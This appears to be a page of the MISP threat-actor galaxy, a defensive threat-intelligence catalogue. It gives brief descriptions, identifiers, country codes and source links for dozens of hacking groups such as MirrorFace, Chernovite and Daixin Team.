MirrorFace is a Chinese-speaking advanced persistent threat group that has been targeting high-value organizations in Japan, including media, government, diplomatic, and political entities. They have been conducting spear-phishing campaigns, utilizing malware such as LODEINFO and MirrorStealer to steal credentials and exfiltrate sensitive data. While there is speculation about their connection to APT10, ESET currently track them as a separate entity.
Internal MISP references
UUID e992d874-604b-4a09-9c6c-0319d5be652a
which can be used as unique global reference for MirrorFace
in MISP communities and other software using the MISP galaxy
External references
- https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/ - webarchive
- https://web-assets.esetstatic.com/wls/2023/01/eset_apt_activity_report_t32022.pdf - webarchive
- https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
VulzSecTeam
VulzSec, also known as VulzSecTeam, is a hacktivist group that has been involved in various cyber-attacks. They have targeted government websites in retaliation for issues such as police brutality and the treatment of Indian Muslims. The group has been involved in campaigns like OpIndia2.0, where they planned to launch DDoS attacks on Indian government websites.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular VulzSecTeam.
Known Synonyms |
---|
VulzSec |
Internal MISP references
UUID fcb18ca2-ea45-4f5c-a827-ed8b6b697a08
which can be used as unique global reference for VulzSecTeam
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | ID |
Chernovite
Chernovite is a highly capable and sophisticated threat actor group that has developed a modular ICS malware framework called PIPEDREAM. They are known for targeting industrial control systems and operational technology environments, with the ability to disrupt, degrade, and potentially destroy physical processes. Chernovite has demonstrated a deep understanding of ICS protocols and intrusion techniques, making them a significant threat to critical infrastructure sectors.
Internal MISP references
UUID 2ce00149-9a25-4dea-8dd5-59bdb68d11a1
which can be used as unique global reference for Chernovite
in MISP communities and other software using the MISP galaxy
External references
- https://www.dragos.com/blog/pipedream-mousehole-opcua-module/ - webarchive
- https://www.dragos.com/blog/industry-news/chernovite-pipedream-malware-targeting-industrial-control-systems/ - webarchive
- https://www.dragos.com/threats/the-2022-ics-ot-vulnerability-briefing-recap/ - webarchive
- https://www.dragos.com/blog/responding-to-chernovites-pipedream-with-dragos-global-services/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
MurenShark
MurenShark is an advanced persistent threat group that operates primarily in the Middle East, with a focus on targeting Turkey. They have shown interest in military projects, as well as research institutes and universities. This group is highly skilled in counter-analysis and reverse traceability, using sophisticated tactics to avoid detection. They utilize compromised websites as file servers and command and control servers, and have been known to use attack tools like NiceRender for phishing purposes.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MurenShark.
Known Synonyms |
---|
Actor210426 |
Internal MISP references
UUID e5c78742-bf60-4da8-b038-d548ae3f4ecb
which can be used as unique global reference for MurenShark
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
DriftingCloud
DriftingCloud is a persistent threat actor known for targeting various industries and locations. They are skilled at developing or acquiring zero-day exploits to gain unauthorized access to target networks. Compromising gateway devices is a common tactic used by DriftingCloud, making network monitoring solutions crucial for detecting their attacks.
Internal MISP references
UUID 6f6b187b-971b-4df9-a7ef-9b3fd7e092f7
which can be used as unique global reference for DriftingCloud
in MISP communities and other software using the MISP galaxy
External references
- https://socradar.io/driftingcloud-apt-group-exploits-zero-day-in-sophos-firewall/ - webarchive
- https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/ - webarchive
- https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
UNC4191
UNC4191 is a China-linked threat actor that has been involved in cyber espionage campaigns targeting public and private sectors primarily in Southeast Asia. They have been known to use USB devices as an initial infection vector and have been observed deploying various malware families on infected systems. UNC4191's operations have also extended to the US, Europe, and the Asia Pacific Japan region, with a particular focus on the Philippines.
Internal MISP references
UUID df697450-57e0-496b-982c-a167ed41f023
which can be used as unique global reference for UNC4191
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
DragonSpark
DragonSpark is a threat actor that has been conducting attacks primarily targeting organizations in East Asia. They utilize the open-source tool SparkRAT, which is a multi-platform and frequently updated remote access Trojan. The threat actor is believed to be Chinese-speaking based on their use of Chinese language support and compromised infrastructure located in China and Taiwan. They employ various techniques to evade detection, including Golang source code interpretation and the use of the China Chopper webshell.
Internal MISP references
UUID a219a78b-7b91-41b1-bf14-91e31e0bb9da
which can be used as unique global reference for DragonSpark
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
FusionCore
The CYFIRMA research team has identified a new up-and-coming European threat actor group known as FusionCore. Running Malware-as-a-service, along with the hacker-for- hire operation, they have a wide variety of tools and services that are being offered on their website, making it a one-stop-shop for threat actors looking to purchase cost- effective yet customizable malware. The operators have started a ransomware affiliate program that equips the attackers with the ransomware and affiliate software to manage victims. FusionCore typically provides sellers with a detailed set of instructions for any service or product being sold, enabling individuals with minimal experience to carry out complex attacks.
Internal MISP references
UUID ab376039-4ede-4dfc-a45b-c80d9d994657
which can be used as unique global reference for FusionCore
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Earth Kitsune
Earth Kitsune is an advanced persistent threat actor that has been active since at least 2019. They primarily target individuals interested in North Korea and use various tactics, such as compromising websites and employing social engineering, to distribute self-developed backdoors. Earth Kitsune demonstrates technical proficiency and continuously evolves their tools, tactics, and procedures. They have been associated with malware such as WhiskerSpy and SLUB.
Internal MISP references
UUID a9f29636-26e4-42f0-95d1-7a49dd6f0a79
which can be used as unique global reference for Earth Kitsune
in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/en_us/research/23/b/earth-kitsune-delivers-new-whiskerspy-backdoor.html - webarchive
- https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html - webarchive
- https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-earth-kitsune-tracking-slub-s-current-operations/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
AppMilad
AppMilad is an Iranian hacking group that has been identified as the source of a spyware campaign called RatMilad. This spyware is designed to silently infiltrate victims' devices and gather personal and corporate information, including private communications and photos. The group has been distributing the spyware through fake apps and targeting primarily Middle Eastern enterprises.
Internal MISP references
UUID e284c356-4b77-4f86-a8f2-7793cbe8662b
which can be used as unique global reference for AppMilad
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
UNC4841
UNC4841 is a well-resourced threat actor that has utilized a wide range of malware and purpose-built tooling to enable their global espionage operations. They have been observed selectively deploying specific malware families at high priority targets, with SKIPJACK being the most widely deployed. UNC4841 primarily targeted government and technology organizations, but they have also been observed targeting other verticals.
Internal MISP references
UUID 8959fbb4-95f0-485d-bba2-db9140b95386
which can be used as unique global reference for UNC4841
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
CL-STA-0043
CL-STA-0043 is a highly skilled and sophisticated threat actor, believed to be a nation-state, targeting governmental entities in the Middle East and Africa. They exploit vulnerabilities in on-premises Internet Information Services and Microsoft Exchange servers to infiltrate target networks. They engage in reconnaissance, locate vital assets, and have been observed using native Windows tools for privilege escalation.
Internal MISP references
UUID 5d0aee14-f18a-44da-a44d-28d950f06b9c
which can be used as unique global reference for CL-STA-0043
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
DEV-0928
DEV-0928 is a threat actor that has been tracked by Microsoft since September 2022. They are known for their involvement in high-volume phishing campaigns, using tools offered by DEV-1101. DEV-0928 sends phishing emails to targets and has been observed launching campaigns involving millions of emails. They also utilize evasion techniques, such as redirection to benign pages, to avoid detection.
Internal MISP references
UUID 8345dd24-7884-48e3-b231-4791d31afe3d
which can be used as unique global reference for DEV-0928
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TEMP_Heretic
TEMP_Heretic is a threat actor that has been observed engaging in targeted spear-phishing campaigns. They exploit vulnerabilities in email platforms, such as Zimbra, to exfiltrate emails from government, military, and media organizations. They use multiple outlook.com email addresses and manually craft content for each email before sending it.
Internal MISP references
UUID 8dfac62e-395e-4e47-b6b6-8ab817ac25c1
which can be used as unique global reference for TEMP_Heretic
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
WeedSec
WeedSec is a threat actor group that recently targeted the online learning and course management platform Moodle. They posted sample databases of Moodle on their Telegram channel, which is widely used by educational institutions and workplaces.
Internal MISP references
UUID 000a2535-8fbf-459d-a067-d10528496a92
which can be used as unique global reference for WeedSec
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA444
TA444 is a North Korea state-sponsored threat actor that primarily focuses on financially motivated operations. They have been active since at least 2017 and have recently shifted their attention to targeting cryptocurrencies. TA444 employs various infection methods and has a diverse range of malware and backdoors at their disposal. They have been attributed to stealing hundreds of millions of dollars' worth of cryptocurrency and related assets.
Internal MISP references
UUID 5a38db83-16b3-477f-a045-66a922868eea
which can be used as unique global reference for TA444
in MISP communities and other software using the MISP galaxy
External references
- https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds - webarchive
- https://cyberscoop.com/north-korean-cryptocurrency-hackers-education-government/ - webarchive
- https://www.darkreading.com/remote-workforce/north-korea-apt-swindled-1b-crypto-investors-2022 - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | KP |
UAC-0006
UAC-0006 is a financially motivated threat actor that has been active since at least 2013. They primarily target Ukrainian organizations, particularly accountants, with phishing emails containing the SmokeLoader malware. Their goal is to steal credentials and execute unauthorized fund transfers, posing a significant risk to financial systems.
Internal MISP references
UUID 013f56ea-a441-483f-812c-c384c790e474
which can be used as unique global reference for UAC-0006
in MISP communities and other software using the MISP galaxy
External references
- https://socprime.com/blog/smokeloader-detection-uac-0006-group-launches-a-new-phishing-campaign-against-ukraine/ - webarchive
- https://socprime.com/blog/smokeloader-malware-detection-uac-0006-hackers-launch-a-wave-of-phishing-attacks-against-ukraine-targeting-accountants/ - webarchive
- https://socprime.com/blog/detecting-smokeloader-campaign-uac-0006-keep-targeting-ukrainian-financial-institutions-in-a-series-of-phishing-attacks/ - webarchive
- https://socprime.com/blog/latest-threats/detect-smokeloader-malware-uac-0006-strikes-again-to-target-ukraine-in-a-series-of-phishing-attacks/ - webarchive
- https://socprime.com/blog/smokeloader-malware-detection-uac-0006-group-reemerges-to-launch-phishing-attacks-against-ukraine-using-financial-subject-lures/ - webarchive
- https://cert.gov.ua/article/4555802 - webarchive
- https://cert.gov.ua/article/6123309 - webarchive
Associated metadata
Metadata key | Value |
---|---|
NewsPenguin
NewsPenguin is threat actor that has been targeting organizations in Pakistan. They use a complex payload delivery mechanism and exploit the upcoming Pakistan International Maritime Expo & Conference as a lure to trick their victims. The group has been linked to a phishing campaign that leverages spear-phishing emails and weaponized documents to deliver an advanced espionage tool.
Internal MISP references
UUID 4c4a8cb7-b4c4-4637-8e41-dfe19a6b40c7
which can be used as unique global reference for NewsPenguin
in MISP communities and other software using the MISP galaxy
External references
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-newspenguin-threat-actors-targeting-pakistani-entities-with-malicious-campaign-active-iocs - webarchive
- https://blogs.blackberry.com/en/2023/02/newspenguin-a-previously-unknown-threat-actor-targets-pakistan-with-advanced-espionage-tool - webarchive
Associated metadata
Metadata key | Value |
---|---|
DefrayX
DefrayX is a threat actor group known for their RansomExx ransomware operations. They primarily target Linux operating systems, but also release versions for Windows. The group has been active since 2018 and has targeted various sectors, including healthcare and manufacturing. They have also developed other malware strains such as PyXie RAT, Vatet loader, and Defray ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DefrayX.
Known Synonyms |
---|
Hive0091 |
Internal MISP references
UUID 9c102b55-29ea-4d90-9b36-33ba42f65d79
which can be used as unique global reference for DefrayX
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
PerSwaysion
PerSwaysion is a threat actor known for conducting phishing campaigns targeting high-level executives. They have been active since at least August 2019 and are believed to be based in Vietnam. PerSwaysion has recently updated their techniques, using more direct phishing methods and leveraging Microsoft 365 to steal credentials.
Internal MISP references
UUID a413c605-0e0a-41ca-bae2-5623908fda3a
which can be used as unique global reference for PerSwaysion
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | VN |
Webworm
Space Pirates is a cybercrime group that has been active since at least 2017. They primarily target Russian companies and have been observed using various malware, including Deed RAT and ShadowPad. The group uses a combination of publicly available tools and their own protocols to communicate with their command-and-control servers.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Webworm.
Known Synonyms |
---|
Space Pirates |
Internal MISP references
UUID ee306b4d-1b2b-4872-a8f1-d07e7fbab2f0
which can be used as unique global reference for Webworm
in MISP communities and other software using the MISP galaxy
External references
- http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-a-look-into-the-group-s-unconventional-techniques-new-attack-vectors-and-tools/ - webarchive
- https://blog.polyswarm.io/space-pirates-target-russian-aerospace - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
N4ughtysecTU
In March 2022, a hacking group calling themselves N4ughtySecTU claimed to have breached TransUnion’s systems and threatened to leak four terabytes of data if the credit bureau didn’t pay a $15-million (R242-million) ransom.
Internal MISP references
UUID 43236d8e-27ee-40f1-ad15-a2ad23738a76
which can be used as unique global reference for N4ughtysecTU
in MISP communities and other software using the MISP galaxy
External references
- https://mybroadband.co.za/news/security/438982-how-bank-customers-can-protect-themselves-after-hackers-leak-transunion-data.html - webarchive
- https://cisoseries.com/cyber-security-headlines-march-21-2022/ - webarchive
- https://mybroadband.co.za/news/security/443090-cybercriminals-love-south-africa-study.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | BR |
Moshen Dragon
Moshen Dragon is a Chinese-aligned cyberespionage threat actor operating in Central Asia. They have been observed deploying multiple malware triads and utilizing DLL search order hijacking to sideload ShadowPad and PlugX variants. The threat actor also employs various tools, including an LSA notification package and a passive backdoor known as GUNTERS. Their activities involve targeting the telecommunication sector and leveraging Impacket for lateral movement and data exfiltration.
Internal MISP references
UUID 41243ff2-e4f1-4605-9259-ab494c1c8c04
which can be used as unique global reference for Moshen Dragon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
TiltedTemple
One of their notable tools is a custom backdoor called SockDetour, which operates filelessly and socketlessly on compromised Windows servers. The group's activities have been linked to the exploitation of vulnerabilities in Zoho ManageEngine ADSelfService Plus and ServiceDesk Plus.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TiltedTemple.
Known Synonyms |
---|
Circle Typhoon |
DEV-0322 |
Internal MISP references
UUID aca6b3d2-1c3b-4674-9de8-975e35723bcf
which can be used as unique global reference for TiltedTemple
in MISP communities and other software using the MISP galaxy
External references
- https://unit42.paloaltonetworks.com/sockdetour/ - webarchive
- https://blog.fox-it.com/2021/11/08/ta505-exploits-solarwinds-serv-u-vulnerability-cve-2021-35211-for-initial-access/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
OldGremlin
OldGremlin is a Russian-speaking ransomware group that has been active for several years. They primarily target organizations in Russia, including banks, logistics, industrial, insurance, retail, and IT companies. OldGremlin is known for using phishing emails as an initial infection vector and has developed custom malware for both Windows and Linux systems. They have conducted multiple malicious email campaigns and demand large ransoms from their victims, with some reaching millions of dollars.
Internal MISP references
UUID ad8b73df-c526-4a32-b52f-c7c3c4c058d2
which can be used as unique global reference for OldGremlin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
Storm Cloud
Storm Cloud is a Chinese espionage threat actor known for targeting organizations across Asia, particularly Tibetan organizations and individuals. They use a variety of malware families, including GIMMICK and GOSLU, which are feature-rich and multi-platform. Storm Cloud leverages public cloud hosting services like Google Drive for command-and-control channels, making it difficult to detect their activities.
Internal MISP references
UUID 3baec27f-3827-4a38-82c8-7195a18193f9
which can be used as unique global reference for Storm Cloud
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
CostaRicto
CostaRicto is a cyber-espionage threat actor that operates as a mercenary group, offering its services to various clients globally. They use bespoke malware tools and sophisticated techniques like VPN proxy and SSH tunnelling. While their targets are scattered across different regions, there is a concentration in South Asia.
Internal MISP references
UUID 5587f082-349b-46ab-9e6f-303d9bfd1e1b
which can be used as unique global reference for CostaRicto
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA402
TA402 is an APT group that has been tracked by Proofpoint since 2020. They primarily target government entities in the Middle East and North Africa, with a focus on intelligence collection. TA402 is known for using sophisticated phishing campaigns and constantly updating their malware implants and delivery methods to evade detection. They have been observed using cloud services like Dropbox and Google Drive for hosting malicious payloads and command-and-control infrastructure.
Internal MISP references
UUID aad291eb-08d1-4af4-9dd1-e90fe1f2d6c6
which can be used as unique global reference for TA402
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | PS |
SilverFish
SilverFish is believed to be a Russian cyberespionage group that has been involved in various cyberattacks, including the use of the SolarWinds breach as an attack vector. SilverFish has been linked to the Wasted Locker ransomware and has displayed a high level of skill and organization in their cyber operations. There are also connections between SilverFish and the threat actor Evil Corp, suggesting a possible evolution or collaboration between the two groups.
Internal MISP references
UUID 55bcc595-2442-4f98-9477-7fe9b507607c
which can be used as unique global reference for SilverFish
in MISP communities and other software using the MISP galaxy
External references
- https://www.truesec.com/hub/blog/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies - webarchive
- https://www.prodaft.com/resource/detail/silverfish-global-cyber-espionage-campaign-case-report - webarchive
- https://www.mandiant.com/resources/blog/unc2165-shifts-to-evade-sanctions - webarchive
Associated metadata
Metadata key | Value |
---|---|
Blacktail
Blacktail is a cybercrime group that has gained attention for its ransomware campaigns, particularly the Buhti ransomware. They are known for using custom-built data exfiltration tools and have been observed exploiting vulnerabilities in both Windows and Linux systems.
Internal MISP references
UUID e06e1bcd-7da2-4732-934a-9fa1efa427ad
which can be used as unique global reference for Blacktail
in MISP communities and other software using the MISP galaxy
External references
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/buhti-ransomware - webarchive
- https://fortiguard.fortinet.com/threat-signal-report/5170 - webarchive
- https://www.redpacketsecurity.com/new-buhti-ransomware-gang-uses-leaked-windows-linux-encryptors/ - webarchive
- https://www.redpacketsecurity.com/buhti-ransomware-gang-switches-tactics-utilizes-leaked-lockbit-and-babuk-code/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
MalKamak
MalKamak is an Iranian threat actor that has been operating since at least 2018. They have been involved in highly targeted cyber espionage campaigns against global aerospace and telecommunications companies. MalKamak utilizes a sophisticated remote access Trojan called ShellClient, which evades antivirus tools and uses cloud services like Dropbox for command and control.
Internal MISP references
UUID 4915bfa3-5f0a-48ec-8ed5-bcd878cba504
which can be used as unique global reference for MalKamak
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
DragonForce
DragonForce is a hacktivist group based in Malaysia that has been involved in cyberattacks targeting government institutions and commercial organizations in India. They have also targeted websites affiliated with Israel and have shown support for pro-Palestinian causes. The group has been observed using defacement attacks, distributed denial-of-service attacks, and data leaks as part of their campaigns. DragonForce Malaysia has demonstrated an ability to adapt and evolve their tactics over time.
Internal MISP references
UUID 40375ed2-04ec-433f-969d-b9a004c0272e
which can be used as unique global reference for DragonForce
in MISP communities and other software using the MISP galaxy
External references
- https://www.darkowl.com/blog-content/hacktivist-groups-use-defacements-in-the-israel-hamas-conflict/ - webarchive
- https://blog.radware.com/security/2023/05/india-one-of-the-most-targeted-countries-for-hacktivist-groups/ - webarchive
- https://securitybrief.asia/story/dragonforce-malaysia-attacks-israeli-institutions-radware - webarchive
- https://www.radware.com/security/threat-advisories-and-attack-reports/opisrael-a-decade-in-review/ - webarchive
- https://blog.radware.com/security/ddos/2022/08/this-was-h1-2022-part-3-beyond-the-war/ - webarchive
- https://www.fortinet.com/blog/threat-research/guidance-on-hacktivist-operation-opspatuk-by-dragonforce - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | MY |
LightBasin
UNC1945 is an APT group that has been targeting telecommunications companies globally. They use Linux-based implants to maintain long-term access in compromised networks. UNC1945 has demonstrated advanced technical abilities, utilizing various tools and techniques to evade detection and move laterally through networks. They have also been observed targeting other industries, such as financial and professional consulting, and have been linked to other threat actors, including MustangPanada and RedDelta.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LightBasin.
Known Synonyms |
---|
CL-CRI-0025 |
UNC1945 |
Internal MISP references
UUID a1955738-563c-413c-8602-ea5b8c89ce21
which can be used as unique global reference for LightBasin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Red-Lili
RED-LILI is an active threat actor that has been identified by Checkmarx SCS research team. They have been publishing malicious packages on NPM and PyPi platforms, and have recently automated the process of creating NPM users for package publication. The Checkmarx team has detected around 1500 malicious packages associated with RED-LILI and has continuously disclosed their findings to the respective security teams.
Internal MISP references
UUID 99d188cf-31e5-440d-a114-297cb2242d73
which can be used as unique global reference for Red-Lili
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
WildCard
Wildcard is a threat actor that initially targeted Israel's educational sector with the SysJoker malware. They have since expanded their operations and developed additional malware variants, disguised as legitimate software, including one written in the Rust programming language called RustDown. Their precise identity remains unknown, but they have shown advanced capabilities and a focus on critical sectors within Israel.
Internal MISP references
UUID dc8a7137-f56e-41db-a500-920e69fa29f5
which can be used as unique global reference for WildCard
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
WildPressure
WildPressure is a threat actor that targets industrial-related entities in the Middle East. They use a variety of programming languages, including C++, VBScript, and Python, to develop their malware. They have been observed using virtual private servers and compromised servers, particularly WordPress websites, in their infrastructure. While there are some minor similarities with other threat actors in the region, there is not enough evidence to make any attribution.
Internal MISP references
UUID 89f5a5cb-514f-46db-8959-6bb9aa991e9f
which can be used as unique global reference for WildPressure
in MISP communities and other software using the MISP galaxy
External references
- https://www.redpacketsecurity.com/it-threat-evolution-q3-2021/ - webarchive
- https://securelist.com/wildpressure-targets-macos/103072/ - webarchive
- https://www.redpacketsecurity.com/wildpressure-targets-industrial-related-entities-in-the-middle-east/ - webarchive
- https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
TunnelSnake
The TunnelSnake campaign demonstrates the activity of a sophisticated actor that invests significant resources in designing an evasive toolset and infiltrating networks of high-profile organizations. By leveraging Windows drivers, covert communications channels and proprietary malware, the group behind it maintains a considerable level of stealth. That said, some of its TTPs, like the usage of a commodity webshell and open-source legacy code for loading unsigned drivers, may get detected and in fact were flagged by Kaspersky's product, giving them visibility into the group’s operation.
Internal MISP references
UUID f0bb3d3a-c012-4d12-b621-51192977f190
which can be used as unique global reference for TunnelSnake
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
ScamClub
ScamClub is a threat actor involved in malvertising activities since 2018. They target the Mobile Web market segment, particularly on iOS devices, where security software is often lacking. ScamClub utilizes obfuscation techniques and real-time bidding integration with ad exchanges to push malicious JavaScript payloads, leading to forced redirects and various scams such as phishing and gift card scams.
Internal MISP references
UUID dae45b1c-f957-4242-aa5b-f36b08994bad
which can be used as unique global reference for ScamClub
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Daixin Team
Daixin is a threat actor group that has been active since at least June 2022. They primarily target the healthcare and public health sector with ransomware attacks, stealing sensitive data and threatening to release it if a ransom is not paid. They have successfully targeted various industries, including healthcare, aerospace, automotive, and packaged foods. Daixin gains initial access through VPN servers and exploits vulnerabilities or uses phishing attacks to obtain credentials. They have been responsible for cyberattacks on organizations such as the North Texas Municipal Water District and TransForm Shared Service Org, impacting their networks and stealing customer and patient information.
Internal MISP references
UUID 5e32baed-f4b5-4149-8540-7515ad8c4dc0
which can be used as unique global reference for Daixin Team
in MISP communities and other software using the MISP galaxy
External references
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-294a - webarchive
- https://www.mycert.org.my/portal/details?menu=431fab9c-d24c-4a27-ba93-e92edafdefa5&id=467c2374-9c18-4fb0-b5a7-155dfca4d611 - webarchive
- https://www.databreaches.net/b-files-leaked/ - webarchive
- https://titaniam.io/ransomware-prevention-daixin-team-ransomware-group/ - webarchive
- https://www.databreaches.net/update-daixin-leaks-more-data-from-bluewater-health-and-other-hospitals-databases-yet-to-be-leaked/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
UNC2717
UNC2717 is a threat actor that engages in espionage activities aligned with Chinese government priorities. They demonstrate advanced tradecraft and take measures to avoid detection, making it challenging for network defenders to identify their tools and intrusion methods. UNC2717, along with other Chinese APT actors, has been observed stealing credentials, email communications, and intellectual property. They have targeted global government agencies using malware such as HARDPULSE, QUIETPULSE, and PULSEJUMP.
Internal MISP references
UUID f1d90b54-4821-41ff-8e07-ac650e0454b7
which can be used as unique global reference for UNC2717
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
UNC2659
UNC2659 has been active since at least January 2021. We have observed the threat actor move through the whole attack lifecycle in under 10 days. UNC2659 is notable given their use of an exploit in the SonicWall SMA100 SSL VPN product, which has since been patched by SonicWall. The threat actor appeared to download several tools used for various phases of the attack lifecycle directly from those tools’ legitimate public websites.
Internal MISP references
UUID 697cb051-5315-4026-bf4c-553b49f817a9
which can be used as unique global reference for UNC2659
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
AeroBlade
AeroBlade is a previously unknown threat actor that has been targeting an aerospace organization in the United States. Their objective appears to be conducting commercial and competitive cyber espionage. They employ spear-phishing as a delivery mechanism, using weaponized documents with embedded remote template injection techniques and malicious VBA macro code. The attacks have been ongoing since September 2022, with multiple phases identified in the attack chain. The origin and precise objective of AeroBlade remain unknown.
Internal MISP references
UUID 47739f40-c80c-435a-bedc-0d2b38e87ddc
which can be used as unique global reference for AeroBlade
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
WIP19
WIP19 is a Chinese-speaking threat group involved in espionage targeting the Middle East and Asia. They utilize a stolen certificate to sign their malware, including SQLMaggie, ScreenCap, and a credential dumper. The group has been observed targeting telecommunications and IT service providers, using toolsets authored by WinEggDrop. WIP19's activities suggest they are after specific information and are part of the broader Chinese espionage landscape.
Internal MISP references
UUID 21bb2dab-4125-4ae8-8966-c7381659e180
which can be used as unique global reference for WIP19
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
UNC2447
UNC2447 is a financially motivated threat actor with ties to multiple hacker groups. They have been observed deploying ransomware, including FiveHands and Hello Kitty, and engaging in double extortion tactics. They have been active since at least May 2020 and target organizations in Europe and North America.
Internal MISP references
UUID 590ecec6-4047-4d0f-9143-2e367700423d
which can be used as unique global reference for UNC2447
in MISP communities and other software using the MISP galaxy
External references
- https://www.esentire.com/blog/hacker-infrastructure-used-in-cisco-breach-discovered-attacking-a-top-workforce-management-corporation-russias-evil-corp-gang-suspected-reports-esentire - webarchive
- https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html - webarchive
- http://internal-www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-financially-motivated-aggressive-group-carrying-out-ransomware-campaigns-active-iocs - webarchive
Associated metadata
Metadata key | Value |
---|---|
UNC215
UNC215 is a Chinese nation-state threat actor that has been active since at least 2014. They have targeted organizations in various sectors, including government, technology, telecommunications, defense, finance, entertainment, and healthcare. UNC215 has been observed using tools such as Mimikatz, FOCUSFJORD, and HYPERBRO for initial access and post-compromise activities. They have demonstrated a focus on evading detection and have employed tactics such as using trusted third parties, minimizing forensic evidence, and incorporating false flags. UNC215's targets are located globally, with a particular focus on the Middle East, Europe, Asia, and North America.
Internal MISP references
UUID 9795249f-8954-4632-830f-7e1f0ebc1dd5
which can be used as unique global reference for UNC215
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
DEV-0569
DEV-0569, also known as Storm-0569, is a threat actor group that has been observed deploying the Royal ransomware. They utilize malicious ads and phishing techniques to distribute malware and gain initial access to networks. The group has been linked to the distribution of payloads such as Batloader and has forged relationships with other threat actors. DEV-0569 has targeted various sectors, including healthcare, communications, manufacturing, and education in the United States and Brazil.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DEV-0569.
Known Synonyms |
---|
Storm-0569 |
Internal MISP references
UUID e883458d-496f-4a94-b916-4b7b83e3d525
which can be used as unique global reference for DEV-0569
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UAC-0118
